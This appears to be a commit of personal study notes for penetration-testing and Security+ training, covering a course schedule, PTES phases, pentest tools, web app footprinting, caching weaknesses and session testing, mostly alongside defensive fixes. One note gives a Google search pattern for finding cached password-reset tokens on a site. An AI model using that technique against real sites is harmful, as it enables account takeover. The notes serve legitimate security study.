Initial push...

src/Security/Training/CompTIA-Sec+.txt

@@ -0,0 +1,31 @@
+Lesson 1: Comparing and Contrasting Attacks
+
+Lesson 2: Comparing and Contrasting Security Controls
+
+Lesson 3: Assessing Security Posture with Software Tools
+
+Lesson 4: Explaining Basic Cryptography Concepts
+
+Lesson 5: Implementing a Public Key Infrastructure
+
+Lesson 6: Implementing Identity and Access Management Controls
+
+Lesson 7: Managing Access Services and Accounts
+
+Lesson 8: Implementing a Secure Network Architecture
+
+Lesson 9: Installing and Configuring Security Appliances
+
+Lesson 10: Installing and Configuring Wireless and Physical Access Security
+
+Lesson 11: Deploying Secure Host, Mobile, and Embedded Systems
+
+Lesson 12: Implementing Secure Network Access Protocols
+
+Lesson 13: Implementing Secure Network Applications
+
+Lesson 14: Explaining Risk Management and Disaster Recovery Concepts
+
+Lesson 15: Summarizing Secure Application Development Concepts
+
+Lesson 16: Explaining Organizational Security Concepts

src/Security/Training/Penttesting Learning Path.txt

@@ -0,0 +1,146 @@
+Note:   This phase listing is based off of my programming background,
+        what I did with Juice Shop, and Fedlearn classes.
+
+Note 2:
+        Free Time at Work phase covers stuff that doesn't fit nicely in the other phases.
+
+Note 3: OWASP Juice Shop:  16% completed.
+        ( Most of 1 stars, a quarter of 2 stars, one or two of the 3 stars, and one 5 or 6 stars )
+
+
+Goals:
+2-3 hours per weekend! (
+                        1 hour per day of video then try and apply concepts.
+                        Application happens either on the day of video or all on Sunday.
+                        )
+
+
+--  Certificates  --
+    Security+
+        Training:    https://store.comptia.org/p/SEC-005-CMLR-2019   ($499.00 at 12 months access)
+        Certificate: https://store.comptia.org/p/CompTIAS            ($499.00 with 1x retake option)
+    CISSP
+        Training:    https://www.isc2.org/Training/Online-Self-Paced ($2,795.00 at 120 day access)
+        Certificate: https://www.isc2.org/Certifications/CISSP       (~$699.00)
+
+
+
+
+::  Phase1:  This phase is a broad rundown of things to look at when doing application hacking.  ::
+
+This is the big picture section of what can be drilled down into. Most of the lessons will be structured to
+fill these knowledge sets. I get a few introduction classes discussing broad topics and then a play by play
+to see the concepts in action.
+
+I then start off proper by getting an introduction into reconnaissance and footprinting the app, network, etc.
+From there, pretty much after reconnaissance, it comes down to a wide array of potential threat vectors.
+I cover the fundamentals with the below topics while re-enforcing what I studied from Fedlearn.
+
+
+
+/**********************************    COMPLETED    **********************************\
+(08/16)  Beginner      2h 22m   by Keith Watson      Penetration Testing: The Big Picture
+(08/16)  Intermediate  2h 38m   by Mike Woolard      Web Application Penetration Testing Fundamentals
+(08/16)  Beginner      1h 2m    by Troy Hunt         Play by Play: Ethical Hacking with Troy Hunt
+
+(08/23)  Intermediate  1h 21m  by Will Vandeva       External Footprinting: Reconnaissance and Mapping
+
+(08/30)  Beginner      1h 14m  by Dawid Czagan       Web App Hacking: Sensitive Data Exposure
+(08/30)  Beginner      1h 2m   by Dawid Czagan       Web App Hacking: Cookie Attacks
+(08/30)  Beginner      1h 0m   by Dawid Czagan       Web App Hacking: Hacking Authentication
+(08/30)  Beginner      49m     by Dawid Czagan       Web App Hacking: Hacking Password Reset Functionality
+
+(09/06)  Beginner      51m     by Dawid Czagan       Web App Hacking: Cross-Site Request Forgery (CSRF)
+(09/06)  Beginner      45m     by Dawid Czagan       Web App Hacking: Caching Problems
+(09/06)  Beginner      50m     by Dawid Czagan       Web App Hacking: Hacking XML Processing
+
+
+/**********************************      TO-DO    **********************************\
+
+... COMPLETED ALL IN THIS PHASE ...
+
+
+::  Phase2:  This phase is to really flesh out the intro phase of 1.  ::
+
+/**********************************    COMPLETED    **********************************\
+
+
+
+/**********************************      TO-DO    **********************************\
+(09/13, 20)
+         Beginner      7h 24m   by Dale Meredith     Performing and Analyzing Network Reconnaissance
+
+(09/27)  Beginner      3h 0m    by Troy Hunt         Ethical Hacking: Evading IDS, Firewalls, and Honeypots
+(10/04)  Beginner      2h 25m   by Troy Hunt         Ethical Hacking: Hacking Web Servers
+(10/11)  Beginner      3h 27m   by Troy Hunt         Ethical Hacking: Session Hijacking
+(10/18)  Beginner      2h 49m   by Troy Hunt         Ethical Hacking: Denial of Service
+(10/25, 11/01)
+         Beginner      5h 25m   by Troy Hunt         Ethical Hacking: SQL Injection
+(11/08, 15)
+         Beginner      4h 49m   by Troy Hunt         Ethical Hacking: Hacking Web Applications
+(11/22, 29)
+         Beginner      4h 56m   by Dale Meredith     Ethical Hacking: Hacking Mobile Platforms
+
+
+(12/06)  Intermediate  1h 56m   by Gus Khawaja       Penetration Testing Automation Using Python and Kali Linux
+(12/06)  Intermediate  3h 32m   by Liam Cleary       Penetration Testing SharePoint
+(12/13)  Intermediate  1h 31m   by Daniel Teixeira   Penetration Testing in Action
+
+
+(12/20, 27)
+         Intermediate  5h 12m   by Jerod Brennen     Performing OSINT Gathering on Corporate Targets
+(01/03)  Intermediate  3h 52m   by Chad Russell      Exploitation: Evading Detection and Bypassing Countermeasures
+(01/10)  Beginner      1h 23m   by Gus Khawaja       Network Penetration Testing Using Python and Kali Linux
+(01/17)  Intermediate  4h 7m    by Troy Hunt         Hack Your API First
+(01/24, 31)
+         Intermediate  9h 25m   by Troy Hunt         Hack Yourself First: How to go on the Cyber-Offense
+(02/07)  Intermediate  1h 57m   by Peter Mosm        OPSEC for Penetration Testers
+
+
+
+
+::  Phase3:  More advanced stuff that looks to bring it all together. ::
+/**********************************    COMPLETED    **********************************\
+
+
+/**********************************      TO-DO    **********************************\
+(02/14)  Intermediate  2h 1m   by Clark Voss         Web Application Penetration Testing: Session Management Testing
+(02/14)  Intermediate  2h 14m  by Sunny Wear         Web Application Penetration Testing with Burp Suite
+
+
+(02/21)  Advanced      1h 15m  by Sunny Wear         Advanced Web Application Penetration Testing with Burp Suite
+(02/28)  Advanced      2h 48m  by Sunny Wear         Writing Burp Suite Macros and Plugins
+(03/06, 13)
+         Advanced      6h 3m   by Gus Khawaja        Penetration Testing and Ethical Hacking with Kali Linux
+
+
+
+
+::  Phase4:  This is for the not so fun part of app pentesting- reports.  ::
+/**********************************    COMPLETED    **********************************\
+
+
+/**********************************      TO-DO    **********************************\
+Intermediate  2h 0m    by Will Vandeva      Writing Penetration Testing Reports
+Beginner      4h 47m   by Ben Sullins       Data Analysis Fundamentals with Tableau
+Intermediate  1h 36m   by Ben Sullins       Enterprise Business Intelligence with Tableau Server
+Intermediate  3h 44m   by Ben Sullins       Big Data Analytics with Tableau
+Intermediate  1h 47m   by Robert Horvick    Data Visualizations Using Tableau Public
+
+
+
+
+::  Free Time at Work  ::
+/**********************************    COMPLETED    **********************************\
+
+
+/**********************************      TO-DO    **********************************\
+Beginner      1h 17m   by Mark Minasi       The Case for PowerShell
+Beginner      6h 19m   by Robert Cain       Beginning PowerShell Scripting for Developers
+Beginner      2h 41m   by Robert Cain       Introduction to PowerShell
+Intermediate  2h 23m   by Mike Thomas       Pivot Tables for Excel 2016
+Intermediate  3h 18m   by Diane McSor       Excel 2016 for Power Users
+
+
+Intermediate  2h 27m   by Troy Hunt         AngularJS Security Fundamentals
+Beginner      1h 38m   by Troy Hunt         Getting Started with Cloudflare Security

src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/Course Overview.txt

@@ -0,0 +1,11 @@
+Penetration Testing:
+    -- Demonstrate weaknesses through simulated attacks
+    -- Determine an orgs. resistance to attacks
+    -- Report on security posture and provide recommendations
+
+
+Overview:
+    -- Role of penetration testing in information security
+    -- Penetration tests
+    -- Penetration Testing Execution Standard (PTES)
+    -- Pen testers and their tools

src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/module-1 - The role of Penetration Testing in Security Testing.txt

@@ -0,0 +1,124 @@
+Overview:
+    -- Information Security Management
+    -- Risk Management
+    -- Security Controls
+    -- Penetration Testing
+
+
+
+
+
+::    Information Security Management    ::
+
+--  (Security Principles)  --
+[  CIA or Security Triad  ]
+
+Confidentiality -->  Only authorized systems, processes, and individuals should have access when needed.
+                Note:  Pretty straightforward but can affect integrity if not maintained...
+
+  Integrity     -->  Information should be protected from intentional, unauthorized, or accidental changes.
+                Note:  Deleted information is bad; but, what if we lose trust in the validity of that
+                       information? Integrity isn't just protection against loss but destructive edits, etc.
+
+ Availability   -->  That information should be available to authorized individuals when needed.
+                Note:  Basically up time. Security is also assurance that one can have near 24/7
+                access for authed users.
+                       This is very important for timely processes such as billing,
+                       business competition, governmental actions militarily or otherwise.
+
+[  Governance  ]:       Leadership and oversight
+[  Guidance  ]:         Policies, plans, standards, guidelines, and procedures
+...geared around...
+[  Risk Management  ]:  (paraphrased)  value/asset identification and risks against them.
+...combined with...
+[  Ethics  ]:           (paraphrased)  promotion of moral guidelines against amoral actions/actors
+                        Note:  This is the- what is the red line concept? We can't ident. or protect
+                        without knowing WHAT we need to prevent and detect against.
+... which improves...
+[  Org. Behavior  ]:    (paraphrased)  improves training, awareness, and org. structure to comply with
+                        business goals and laws.
+
+
+
+
+::    Risk Management    ::
+(Penetration testing is just one tool of many to identify risks to the security of the org.)
+
+[  Establish Risk Context  ]:  Environment in which decisions on risk are made. (Risk Management Strategy)
+
+[  Assess Risks  ]:            (paraphrased)  Who, what, when, where, why (This looks at the org.'s over
+                                                                           all posture and Risk Management
+                                                                           Strategy)
+
+[  Respond to Risks  ]:         Evaluating, developing, and implementing response to reduce/limit risk.
+
+[  Monitor Risks  ]:            (paraphrased)  adapting to changes of threats or changes of value targets
+                                to re-posture security and the aforementioned systems.
+
+
+--  (Principles)  --
+[  Avoidance  ]:     (paraphrased)  Don't do stupid shit that you know exposes oneself to threats.
+                     IE, bad practices and policies
+
+[  Transference  ]:  Sharing risk (often linked with insurance) is only part of the picture. *(legal responsibility is not transferred)
+                     If using cloud, the responsibility is shared between you and the provider.
+
+[  Mitigation  ]:    security controls, counter-measures, monitoring tools
+
+[  Acceptance  ]:    willing to take the punch if loss occurs. Basically, not much of a defense or barely mitigateable.
+                     Note: likelihood is low
+
+
+::    Security Controls    :: (Establish boundaries)
+
+--  Control Mechanisms  --
+[  Detective  ]:    Discover when policies have been violated   (Intrusion detection system, IDS)
+[  Preventive  ]:   Inhibit actions that violate policies    (firewalls)
+[  Corrective  ]:   Use violations or exceptions to counteract the violation   (configuration management)
+[  Deterrent  ]:    Discourage aberrant actions/violations    (User accounts)
+[  Recovery  ]:     Flow control to normal state  (system backups)
+
+--  Control Types  --
+[  Administrative  ]:     define and manage access to information   (background checks)
+[  Technical  ]:          logical controls in systems that determine access to info n' services   (patching systems and app)
+[  Physical  ]:           mechanisms that protect access to physical spaces and devices.  (cameras)
+
+
+--  Testing Controls  --
+"Box" Testing
+
+[  White Box  ]:  aka, Crystal box testing, has complete information about, and access to the system being tested.
+                  (user accounts, admin access, documentation, source code, test suits and frameworks, test cases, algorithm descriptions, etc.)
+
+[  Grey Box  ]:   some info is available but not complete
+                  (source code but no user accounts or admin access. Api calls anyone??)
+
+[  Black Box  ]:  no information or access. Purely blind except for what is publicly accessible.
+                  (crafting inputs and observing responses)
+
+
+
+
+::    Penetration Testing    ::
+
+Determine effectiveness of real world attacks.
+Determine the level of skill required.
+Ident. needed security  controls.
+Evaluate response to the attack.
+
+--  Tools, Techniques, and Procedures  --
+
+Exploit known vulnerabilities.
+Find new vulnerabilities
+Use existing tools
+Create new tools
+Social engineering
+
+--  Colloquialisms and Terms  --
+
+"Pen Test"    == Penetration testing
+"Pen"         == Even shorter- "How is the pen going?"
+"Red Team"    == From military and intelligence groups meaning "The attackers"
+"Blue Team"   == The defenders
+"Purple Team" == a combo of red n blue teams, in an exercise to test specific
+                 controls and skill sets

src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/module-2 - Penetration Tests.txt

@@ -0,0 +1,142 @@
+Overview:
+    -- Manual and Automated Testing
+    -- Goal-oriented and Time-limited Testing
+    -- Network Focused Testing
+    -- Application Focused Testing
+    -- Physical Testing
+    -- Social Engineering
+
+
+::    Manual and Automated Testing    ::
+
+--  Manual  --
+Require understanding target
+Create custom queries and inputs
+Configure a tool specifically for the target
+Create custom code
+Interpret output and results
+Consider the internal state and operations
+
+
+[  Low error rate  ]
+    -- Few False Positives
+    -- Few False Negatives
+[  Level of effort  ]
+    -- Exploration: High
+    -- Interpretation: High
+[  Likelihood of detection  ] == Low
+
+
+--  Automated  --
+Requires a target
+Can use default settings
+Must review results
+Adjust settings
+Repeat tests
+
+
+[  High error rate  ]
+    -- More False Positives
+    -- More False Negatives
+[  Level of effort  ]
+    -- Exploration: Low
+    -- Interpretation: Medium
+[  Likelihood of detection  ] == High
+
+
+
+
+::    Goal-oriented and Time-limited Testing    ::
+
+--  Goal-oriented  --  (  Specific targets; Narrows focus  )
+
+Define goal in contract
+Provide proof that goal was achieved
+Get access on specific system
+Place a fake device in an office
+Exfil. a specific type of data
+
+
+--  Time-limited  --
+Cost controlled by client.
+Take a comprehensive buyt focused approach
+Provide valuable actionable data
+Highly targeted due to time frame
+
+
+
+
+::    Network Focused Testing    ::
+Attain unauthorized access
+Evaluate compromised system
+Pivot to the next system
+Repeat
+
+
+--  Org. Network Types
+[  Internal Network  ]:   Informational assets exist, stored, processed, managed, and processed.
+                          (Physical and virtual network wiring)
+
+[  Wireless Network  ]:   (wireless clients, access points, and management systems)
+                          Can act as a perimeter network.
+
+[  Perimeter Network  ]:  Provides access to a portion of a systems network  (eail, web, DNS servers, and VPN)
+                          Third party apps and services go here too.
+
+
+
+
+::    Application Focused Testing    ::
+Commercial-off-the-shelf  (COTS)
+Internally developed
+Third-party developed
+Shadow IT  (Unvetted applications that you're not aware of necessarily.
+            Printer drivers maybe? NIC drivers? Etc...)
+Software-as-a-Service (SaaS)
+
+
+[  Outdated Software  ]
+
+[  Misconfiguration  ]
+
+[  Poor design  ]
+
+[  Poor implementation  ]
+
+
+--  Application Types  --
+Enterprise Apps:  org. wide systems such as enterprise resource planning or ERP apps,
+                  HR systems, customer relationship management or CRM apps, or file
+                  storage and archive systems
+
+Web Sites, Apps, and Services
+
+Mobile Apps:   Sensitive data locally on a device. Easily lost or subject to search.
+
+Thick Clients:  Desktop applications that store data locally or access sensitive data remotely
+
+
+
+::    Physical Testing    ::
+
+
+--  information Gathering  --
+[  Dumpster Diving  ]
+
+[  Surveillance  ]
+    -- Observation
+    -- Photo and Video
+
+[  Satellite Imagery  ]
+    -- Ident. perimeters of facility, locations of physical plant and utilities, points of
+       surveillance and entry, and for measuring distances around the facility.
+
+[  Open Sources  ]
+    -- Client's websites, city, county, and court records, and filings with regulatory agencies.
+
+
+
+
+::    Social Engineering    ::  (  Hacking the human mind  )
+
+--  Pretexting  --

src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/module-3 - PTES.txt

@@ -0,0 +1,148 @@
+Overview:
+    -- Use of the PTES
+    -- Pre-engagement Interactions
+    -- Intelligence Gathering
+    -- Threat Modeling
+    -- Vulnerability Analysis
+    -- Exploitation
+    -- Post Exploitation
+    -- Reporting
+
+
+
+::  Use of the PTES  ::
+
+http://www.pentest-standard.org/index.php/Main_Page
+
+
+
+
+::  Pre-engagement Interactions  ::
+[  Project scoping  ]:  Defining effort, size of tests, time of work, scope creep mitigation
+
+[  Information Gathering  ]:  See module-3-image-1 in this dir. (Not exhaustive list)
+
+[  Defining Goals  ]:  No dih side
+
+[  Emergency Contacts  ]:  Systems could go down, vulnerability found, etc.
+                           Get:  Full name, Title and operational responsibility,
+                                 Authorization to discuss testing activities
+                                 Two 24/7 contact numbers
+                                 A method of secure information exchange
+
+
+[  Rules of Engagement  ]:   HOW will things be tested? Time lines, locations, evidence handling,
+                             status updates, testing times, permission to test documents, etc.
+
+
+
+
+::  Intelligence Gathering  ::
+Target selection
+Identification and Naming
+OSINT - Open Source Intelligence: See module-3-image-2 for more info in a broad
+        setup / or look through documentation at the link above
+
+Footprinting:  DNS, DHCP, BGP, Whois databases, and even packet sniffing
+
+
+
+
+::  Threat Modeling  ::  (Included in report to client...)
+Business Asset Analysis
+
+[  Business Process Analysis  ]:   Technical infrastructure
+                                   Information Assets
+                                   Human Assets
+                                   Third Party Integration
+
+[  Threat Agents / Community Analysis  ]:  see module-3-image-3 image for quick rundown...
+
+[  Threat Capability Analysis  ]:    Analyzing tools used buy threats, availability of tools and exploits,
+                                     comms mechanisms, accessibility
+
+[  Motivation Modeling  ]:     Money, fame/fun, hacktivism, grudge, nation state threats?
+
+
+
+
+::  Vulnerability Analysis  ::
+[  Active  ]:      Interaction with system (network scanners, app scanners,
+                   protocol specific scanners, manual/direct scans)
+
+[  Passive  ]:     Metadata analysis, traffic monitoring
+
+[  Validation  ]:  Confirming results through correlation and manual testing. Attack trees and attack avenues
+
+[  Research  ]:     Public knowledge/portals/vendors, exploit DBs, common passwords,
+                    hardening guides for understanding weaknesses, disassembly and code analysis
+
+
+
+
+::  Exploitation  ::
+(  Leveraging what was found in the Vulnerability Analysis  )
+
+[  Countermeasures  ]:    Protection mechanisms --> Anti-virus software,
+                          Humans (like being helpful), Data Execution Protection,
+                          Address space layout randomization, Web Application Firewalls (WAFs)
+
+[  Evasion  ]:            Avoiding detection
+
+[  Precision Strike  ]:   Only use exploits most likely to achieve success
+
+[  Customized Exploitation Avenue   ]:  Customizing exploits
+
+[  Tailored Exploits  ]:    These require development work  --> Basically, it might have worked
+                            on one machine, model, or system but needs change to work on another
+
+[  Zero-day Angle  ]:    Fuzzing / fault injection, source code analysis
+                         (Buffer overflows, structured exception handling or SEH overwrites,
+                         and return-oriented programming),  Traffic analysis, etc
+
+[  Example Avenues of Attack  ]:  This is on the website but attempts to explain various avenues of attack.
+
+[  Overall Objective  ]:   How project objectives should be considered when creating exploit path/process
+
+
+
+
+::  Post Exploitation  ::
+
+Rules of Engagement:      Protects you and protects client
+
+Infrastructure Analysis:  Learning system for pivoting and concluding report
+
+Pillaging:                *Not what it sounds like:  Alll about gathering system
+                           info such as security, programs installed, configuratuions,
+                           security, email, EVERYTHING!!
+
+High Value / Profile Targets
+
+Data Exfil.:  How data can be removed? Finding this out...
+
+Persistence:   Backdoor persistence, credential sniffing, keyloggers, etc.
+
+Pivoting:   Further exploits to other systems
+
+Cleanup:  Remove everything done to system during attack. Config changes, programs, etc.
+
+
+
+::  Reporting  ::
+Executive summery:
+     -- Background
+     -- Overall Posture
+     -- Risk Ranking / Profile of org.
+     -- General Findings
+     -- Recommendations Summary
+     -- Strategic Roadmap for mitigation
+
+Technical Report:
+    -- Introduction:  Outline key facts about the test and results
+    -- Information Gathering:  Should describe intel gathered and how. (Active or Passive means?)
+    -- Vulnerability Assessment:  Risk-ranked list of potential vulnerabilities discovered
+    -- Exploitation:
+    -- Post Exploitation: Describes activities that occurred once access was established
+    -- Risk: Describes and quantifies risks, vulnerabilities, exploitation, and post exploits
+    -- Conclusion: Highlight key finding

src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/module-4 - Pen Testers and their Tools.txt

@@ -0,0 +1,64 @@
+Overview:
+    -- Penetration Testers
+    -- Penetration Testing Tools
+    -- Certifications
+    -- Pluralsight Courses
+
+
+
+::  Penetration Testers  ::
+Curious
+Likes to solve puzzles
+Driven by achievement
+Detail oriented
+Security background:  Info Sec
+Technology education:  Programmers
+
+
+
+
+::  Penetration Testing Tools  ::
+OS:   Kali Linux or maybe macOS
+
+Vulnerability Scanning:    Nmap (swiss-army-knife XD), Metsploit, Open VAS,
+                           Skipfish  (website assessment tool),
+                           WPScan (wordpress scanning tool),
+                           *Commercial: Rapi7 Nexpose, Qualys, Tenable Nessus
+
+Vulnerability Exploitation:  Metasploit, Rapid7's Metasploit, SQLmap (sql injection),
+                             Social Engineering Toolkit, BeEF (browser exploitation framework for)
+
+Password Cracking:   John the Ripper, Hashcat, Ophcrack, rainbow Tables
+
+Documentation tools:   leafpad, KeepNote, Libreoffice, Desktop recording,
+
+
+
+
+::  Certifications (For Pen Testers)  ::
+EC-Council:
+    --  CEH --> Certified Ethical Hacker
+    --  LPT --> Licensed Penetration Tester
+
+Offensive Security:
+    -- OS Certified Professional (OSCP)
+    -- OS Wireless Professional (OSWP)  [Wireless network penetration testing cert.]
+    -- OS Certified Expert (OSCE)       [Higher level]
+    -- OS Exploitation Expert (OSEE)    [Windows focused with practical exam creating exploit]
+    -- OS Web Expert (OSWE)             [web app exploiting]
+
+
+
+
+::  Pluralsight Courses  ::
+Ethical Hacking (CEH Prep)  [From EC-Council]
+
+Other:
+    -- Introductory Courses --
+    See module-4-image-1  image
+
+    -- Advanced Courses --
+    See module-4-image-2  image
+
+    -- Play by Plays --
+    See module-4-image-3  image

src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/Course Overview.txt

@@ -0,0 +1,9 @@
+Concepts:
+    ...
+
+Overview:
+-- Google Caching
+-- Cacheable HTTPS Responses
+-- Caching of Credit Card Data
+-- Sensitive Data in the URL
+-- Industry Best Practices

src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-1 - Google Caching.txt

@@ -0,0 +1,44 @@
+Overview:
+    -- Google Indexing and Caching
+    -- How to Find Sensitive Data in Google
+    -- Demo
+    -- Fixing the Problem
+
+
+
+::  Google Indexing and Caching  ::
+--  Tool(s)  --
+
+Google be god and library of secrets.
+
+
+
+
+::  How to Find Sensitive Data in Google  ::
+--  Tool(s)  --
+
+See if a users password reset link has been cache...
+See if token is still valid.
+
+In google search try the following:
+
+    site:example.com
+    inurl: token  <-- where token is a string to search for
+
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Skipped...
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Don't store sensitive data in urls.
+Add to sensitive pages:
+    <meta name="robots" content="noindex,nofollow">

src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-2 - Cacheable HTTPS Responses.txt

@@ -0,0 +1,40 @@
+Overview:
+    -- HTTPS Is Not Enough!
+    -- Demo
+    -- Fixing the Problem
+
+
+
+::  HTTPS Is Not Enough!  ::
+--  Tool(s)  --
+
+If https responses are cacheable.
+What if password reset is cached and header has the info?
+Security is bypassed....
+
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+    about:cache  <-- firefox
+
+HTTPS: secure communication channel
+
+Sensitive data returned in HTTPS response (e.g. password)
+                     +
+Cacheable HTTPS response (e.g. Cache-control/Pragma headers not implemented)
+                     =
+Password cached in plaintext
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Don't return sensative data in HTTPS responses.
+Set proper caching headers like cache control and pragma...
+
+    Cache-control: no-store
+    Pragma: no-cache

src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-3 - Caching of Credit Card Data.txt

@@ -0,0 +1,24 @@
+Overview:
+    -- Caching of Data Entered by the User
+    -- Demo
+    -- Fixing the Problem
+
+
+
+
+::  Caching of Data Entered by the User  ::  && ::  Demo  ::
+--  Tool(s)  --
+
+Sensitive data entered by user.
+autocomplete="off" not used in form fields...
+Stores credit card info in plain text from cache.
+*** What's really bad is that companies are more
+    and more geared to check the validity of the card
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+autocomplete="off" for every input field that takes sensitive data

src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-4 - Sensitive Data in the URL.txt

@@ -0,0 +1,30 @@
+Overview:
+    -- URL and Sensitive Data
+    -- Demo
+    -- Fixing the Problem
+
+
+
+
+::  URL and Sensitive Data  ::
+--  Tool(s)  --
+
+GET post?? Yup...
+Don't.
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Shows server logs containing the password.
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Use POST for sensitive data transfer including things
+like no-cache in cache-control and pragma plus autocomplete="off"
+in form fields.

src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-5 - Industry Best Practices.txt

@@ -0,0 +1,19 @@
+Overview:
+    -- OWASP ASVS
+    -- V9: Data Protection Verification Requirements
+
+
+
+
+::  OWASP ASVS  ::
+--  Tool(s)  --
+
+Look at the OWASP ASVS data protection module...
+
+
+
+
+::  V9: Data Protection Verification Requirements  ::
+--  Tool(s)  --
+
+See  module-5-image-1   mage

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/Course Overview.txt

@@ -0,0 +1,9 @@
+Overview:
+    -- The Principles of a Web Application Penetration Test
+    -- Pre-engagement
+    -- Footprinting
+    -- Attacking User Controls
+    -- Attacking Application Inputs
+    -- Common Attack Methods
+    -- Discovering Logic Flaws
+    -- Reporting

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/module-1 - The Principles of a Web Application Penetration Test.txt

@@ -0,0 +1,95 @@
+Overview:
+    -- Methodology of Attack
+    -- Structure of Web Applications
+    -- Cookies and Sessions
+    -- Lab Details
+
+
+::  Methodology of Attack  ::
+[  Poke at the Pillars  ]
+   -- Authentication
+   -- Authorization
+   -- Confidentiality
+   -- Integrity
+   -- Availability
+
+(  Map Content  )
+    -- Visible
+    -- Hidden [robots.txt, forced browse]
+    -- Analyze
+
+
+(  User Controls  )
+    -- Authentication
+    -- Access Controls
+    -- Session
+
+(  Attack Inputs  )
+    -- Form Input
+    -- Header
+    -- URL
+    -- Cookies
+    -- Hidden fields
+    -- XSS / Injection
+
+(  Site Logic  )
+    -- Positive security model
+    -- Fail securely
+    -- Principles of least privilege
+    -- Security by obscurity
+    -- Client trust
+    -- Information leakage
+
+
+
+
+::  Structure of Web Applications  ::
+
+(  HTTP Request Headers  )
+       verb       URI        Version
+Ex:    GET   /order/12345    HTTP/1.1
+
+       User-Agent                           Cookies              Referrer
+Ex:    Mozilla/5.0 (Windows NT 6.1; WOW64)  id=klkjuhyjhuty67uy  https://www.google.com
+
+
+(  HTTP Response Headers  )
+
+[  Status Code  ]
+    -- 100 - informational
+    -- 200 - Success
+    -- 300 - Redirection
+    -- 400 - Something wrong (user)
+    -- 500 - Something wrong (server)
+
+      Status Code       Server
+Ex:   HTTP/1.1 200 OK   Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.9.1f
+
+
+(  Structure of URL  )
+<protocol>//<domain name>/:<port if any>?<parameters>a=123Z&b=me
+
+? = parameters
+& = separate parameters
++ or %20 = spaces
+
+(  Symbol Encoding  )
+See  module-1-image-1  image
+
+[  Other  ]
+    -- Unicode
+    -- Hex Encoding
+    -- Base64 Encoding
+
+
+::  Cookies and Sessions  ::
+Cookies store session keys
+Flags:
+    httponly
+    secure
+
+Session data is server side.
+
+
+::  Lab Details  ::
+See  module-1-image-2  image

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/module-2 - Pre-engagement.txt

@@ -0,0 +1,44 @@
+Overview:
+    -- Black Box / Grey Box / White Box
+    -- Rules of Engagement
+    -- Scoping
+
+
+
+::  Black Box / Grey Box / White Box  ::
+
+"Box" Testing
+
+[  Black Box  ]:  no information or access. Purely blind except for what is publicly accessible.
+                  (crafting inputs and observing responses)
+
+[  White Box  ]:  aka, Crystal box testing, has complete information about, and access to the system being tested.
+                  (user accounts, admin access, documentation, source code, test suits and frameworks, test cases, algorithm descriptions, etc.)
+
+[  Grey Box  ]:   some info is available but not complete
+                  (source code but no user accounts or admin access. Api calls anyone??)
+
+
+
+
+::  Scoping  ::
+(  All about permission  )
+
+Reason for test??
+Applications and IP in scope??
+Applications and IP NOT in scope??
+Live or test environment??
+3rd parties evolved??
+Techniques allowed??
+
+
+
+
+::  Rules of Engagement  ::
+Contact info is important
+Start / end Time
+Whitelist / blacklist
+Blocked
+Test type?
+Test Credentials
+Access to data??

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/module-3 - Footprinting.txt

@@ -0,0 +1,63 @@
+Overview:
+    -- Spider Application
+    -- Discover Server Information
+    -- Discover Hidden Content
+    -- Automated Scans
+    -- Analyze Results
+
+
+
+::  Spider Application  ::
+
+[  OWASP Zed Attack Proxy (ZAP)  ]
+
+Add site to context
+1. r-click root of context and "Attack" > "Spider" it.
+2. You can force scan additional hidden pages by r-click and "Attack" > "Forced Browse" the directory and children
+
+
+
+
+::  Discover Server Information  ::
+-- Tool(s) --
+    HTTP Print
+    Wappalyzer (FF plugin)  [Helps get technology stack info.]
+
+Can use browser response header info too.
+Information leakage can help too. IE, plugins that display version info, etc
+
+See  module-3-image-1  image for app types
+
+
+
+
+::  Discover Hidden Content  ::
+
+--  Tool(s)  --
+    Foca  (Google foo)
+
+Robots.text
+Forced Browsing:       Common files and folders that are popular for private information  (BURP: Content Discovery)
+Public Information     "Google Hacking"
+Comments               Comments sitting in code  (BURP Suit has a find comments in page feature)
+
+
+
+
+::  Automated Scans  ::
+
+--  Tool(s)  --
+See  module-3-image-2  image
+CMSmap:    attack and review WordPress, Joomla, and Drupal.
+WPScan:    Wordpress
+Joomscan:  Joomla
+SQLmap:    injection tool
+
+SSLlabs:   https://www.ssllabs.com/ssltest/
+SSLscan:   Kali linux tool
+
+
+
+
+::  Analyze Results  ::
+Getting all the data together and reviewing...

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/module-4 - Attacking User Controls.txt

@@ -0,0 +1,47 @@
+Overview:
+    -- Authentication
+    -- Session
+    -- Access Controls
+
+
+::  Authentication  ::
+
+POST over HTTPS:  Ensure can't get to HTTP side
+
+Pretty much covers standard policies such as Lockout policies, password lengths and strength,
+whether over https with post (the best correct way) and whether any other (the worst wrong way)
+
+Password reset links should be tokenized and live for 5, 10, to 20 minutes. If still alive past 24 hours it's a finding.
+Obviously limit previous password usage to some degree (60 rounds before reuse)
+
+Security question /answer:  Is it limited or infinite in nature?
+
+What is your favorite NBA team?  == about 30 total. Will it let me try all
+thirty or lock out and request I call help line?
+
+
+
+::  Session  ::
+Is the session token meaningful or completely random?? NEVER base64 shit into it!!!
+Determine if content encode.
+
+Try generating multiple tokens. See if any repetition.
+Create multiple accounts.
+Compare tokens against access levels guest/admin
+
+
+--  Predictability and Randomization  --
